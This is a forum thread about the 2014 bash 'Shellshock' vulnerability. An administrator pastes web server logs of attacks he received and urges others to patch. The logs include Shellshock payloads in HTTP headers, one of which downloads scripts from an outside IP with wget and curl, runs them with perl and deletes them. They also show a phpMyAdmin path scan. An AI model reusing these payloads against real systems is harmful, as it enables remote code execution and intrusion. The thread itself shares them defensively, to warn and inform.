The patch blog has:
https://blogs.oracle.com/patch/entry/solaris\_idrs\_available\_on_mos
information on dealing with bash 'shellshock' vulnerability.
4 Likes
I don't understand this bug. Does attacker need account?
Hi,
No, the attack does not require the attacker to have an account. They can make use of the account that is running the service that they attack through.
As an example, if you have a web server running - it would normally be run by a user. This could be "apache", "webserver" or if you are very unlucky "root".
The "shellshock" vulnerability will allow an attacker to leverage the owner of a service privileges to potentially gain access to some or all of a server or it's data.
I have seen a large number of assaults on my estate, below are the typical things that you are seeing. So far I haven't had any serious problems, I had started patching before the first attack so was lucky.
XXX.XXX.93.149 - - [25/Sep/2014:05:08:03 +0100] "GET /w00tw00t.at.blackhats.aaaaaa.aaaa-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
XXX.XXX.93.149 - - [25/Sep/2014:05:08:03 +0100] "GET /something_here/scripts/setup.php HTTP/1.1" 404 306 "-" "ZmEu"
XXX.XX.69.74 - - [25/Sep/2014:18:53:51 +0100] "GET / HTTP/1.1" 200 2455 "() { :; }; /bin/ping -c 1 XXX.XXX.0.69" "() { :; }; /bin/ping -c 1 XXX.XXX.0.69"
As you'll probably be able to see from the above, the attempts to gain access are coming from different IP Addresses I now have lists of several hundred. The most common seem to be trying to gain access to things like Mysql databases, firewall block lists and attempts to clear them along with access to a host of standard setup utilities.
The /bin/ping could just as easily be a "wget" or "ftp" placing malicious code or a million other things designed to make a systems admin unhappy.
Regards
Dave
2 Likes
Hi Guys,
Just to let you know, if you are running any internet facing servers with the bash (shellshock) vulnerability still evident you are risking a major intrusion. I am now seeing a spike in activity, complexity and frequency of the attempts on my web servers.
Here is a sample of what I'm seeing.
54.251.83.67 - - [29/Sep/2014:01:36:14 +0100] "GET / HTTP/1.1" 200 2455 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
173.45.100.18 - - [29/Sep/2014:01:44:17 +0100] "GET /cgi-bin/ HTTP/1.1" 403 290 "-" "-"
173.45.100.18 - - [29/Sep/2014:01:44:18 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
So if you're still unpatched - best get to it. The more advanced guys will be along very soon now.
There is still the script kiddy stuff as well, typically stuff like this.
210.51.47.229 - - [29/Sep/2014:11:29:43 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:44 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:46 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:48 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:50 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:52 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:53 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:55 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:57 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:59 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:01 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:04 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:06 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:08 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:09 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:11 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:13 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:15 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:17 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:19 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:20 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
But even that will improve, so better safe than sorry.
Regards
Dave
1 Like